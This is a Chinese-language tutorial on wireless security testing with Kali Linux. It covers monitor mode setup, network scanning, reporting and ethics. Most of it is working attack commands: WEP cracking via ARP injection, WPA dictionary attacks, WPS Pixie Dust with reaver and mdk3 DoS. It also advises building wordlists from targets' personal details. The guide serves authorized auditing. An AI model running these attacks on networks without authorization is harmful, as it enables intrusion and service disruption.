一、测试环境搭建与基础准备
1.1 系统环境要求
开展无线网络安全测试需满足以下硬件条件:支持监听模式的无线网卡(推荐采用Atheros或Realtek芯片的USB网卡)、至少4GB内存的测试主机。软件层面需使用最新版Kali Linux系统,该系统已预装aircrack-ng、reaver等核心测试工具。
1.2 终端环境配置
通过SSH或本地终端登录系统后,建议执行以下初始化操作:
# 更新软件包索引sudo apt update# 安装缺失依赖(如未预装)sudo apt install -y aircrack-ng wireshark reaver# 创建专用测试目录mkdir ~/wireless_audit && cd ~/wireless_audit
二、无线网卡监听模式激活
2.1 网卡状态确认
执行ip a命令查看网络接口,重点关注wlan0等无线接口。若系统未识别网卡,需通过lsusb确认设备是否被系统识别,并检查内核模块加载情况:
lsmod | grep ath # 针对Atheros芯片lsmod | grep rtl # 针对Realtek芯片
2.2 进程冲突处理
关闭可能干扰监听的守护进程:
sudo airmon-ng check kill# 验证关键进程是否终止ps aux | grep -E 'NetworkManager|wpa_supplicant'
2.3 模式转换操作
执行监听模式转换命令时需注意:
# 标准转换命令sudo airmon-ng start wlan0# 特殊情况处理(如驱动兼容问题)sudo modprobe -r ath9k && sudo modprobe ath9ksudo airmon-ng start wlan0
转换成功后,新接口名称会添加mon后缀(如wlan0mon)。通过iwconfig验证模式显示应为Monitor,频率范围应覆盖2.4GHz/5GHz频段。
三、无线网络信息收集
3.1 基础扫描技术
使用airodump-ng进行被动扫描:
sudo airodump-ng wlan0mon
关键输出字段解析:
- BSSID:路由器MAC地址(前3字节为厂商OUI)
- CH:工作信道(需记录用于定向扫描)
- ENC:加密类型(WEP/WPA/WPA2/WPA3)
- CIPHER:加密套件(CCMP/TKIP)
- AUTH:认证方式(PSK/802.1X)
3.2 定向扫描优化
针对特定网络进行深度扫描:
sudo airodump-ng --bssid AA:BB:CC:DD:EE:FF --channel 6 --write target_scan wlan0mon
该操作会生成包含握手包的.cap文件,为后续密码破解提供数据基础。建议扫描时长不少于10分钟以捕获完整握手过程。
3.3 隐藏网络探测
对于未广播SSID的网络,可采用以下方法:
- 通过信道扫描发现异常信号强度波动
- 使用
wash工具检测WPS功能开启的网络 - 结合
mdk3工具进行DoS攻击诱导客户端暴露SSID
四、漏洞验证与利用
4.1 WEP加密破解
针对WEP加密网络的典型攻击流程:
# 捕获IV数据包sudo airodump-ng --bssid AA:BB:CC:DD:EE:FF --channel 6 --ivs -w wep_capture wlan0mon# 发起ARP注入攻击sudo aireplay-ng -3 -b AA:BB:CC:DD:EE:FF wlan0mon# 破解密钥sudo aircrack-ng wep_capture-01.ivs
破解成功率与捕获数据包数量成正比,建议至少收集10,000个IV包。
4.2 WPA/WPA2破解
针对PSK认证的破解方法:
# 分离握手包sudo aircrack-ng target_scan-01.cap# 字典攻击示例sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt target_scan-01.cap
提升破解效率的建议:
- 使用GPU加速工具(如hashcat)
- 定制针对性字典(包含生日、手机号等个人信息)
- 实施社会工程学获取密码线索
4.3 WPS漏洞利用
针对WPS功能开启的路由器:
# 检测WPS状态sudo wash -i wlan0mon# 执行Pixie Dust攻击sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 6 -K 1 -vv
该攻击可在数分钟内获取PSK密码,但需注意部分厂商已修复此漏洞。
五、测试结果分析与报告
5.1 数据包分析技巧
使用Wireshark进行深度分析:
- 过滤802.11管理帧(wlan.fc.type_subtype == 0x08)
- 分析EAPOL握手过程(eapol过滤)
- 检测异常重传帧(duplicate frame标识)
5.2 漏洞评级标准
参照CVSS评分体系进行风险评估:
| 漏洞类型 | 严重程度 | 利用难度 | 影响范围 |
|————————|—————|—————|—————|
| WEP加密 | 严重 | 低 | 网络全部 |
| WPS漏洞 | 高危 | 中 | 管理界面 |
| 弱密码 | 中危 | 取决于密码复杂度 | 认证系统 |
5.3 报告撰写规范
完整测试报告应包含:
- 测试范围与方法论说明
- 发现的漏洞清单(含CVE编号)
- 攻击路径示意图
- 修复建议(如升级固件、禁用WPS等)
- 风险评估矩阵
六、安全测试伦理规范
进行无线网络安全测试必须遵循:
- 获得书面授权(测试范围、时间窗口明确)
- 限制测试强度(避免造成服务中断)
- 保护捕获数据(加密存储,及时删除)
- 遵守《网络安全法》等相关法规
建议在实际测试前搭建模拟环境进行技能验证,可使用虚拟机创建多个虚拟AP进行攻击演练。测试完成后务必执行sudo airmon-ng stop wlan0mon恢复网卡正常模式,避免影响网络使用。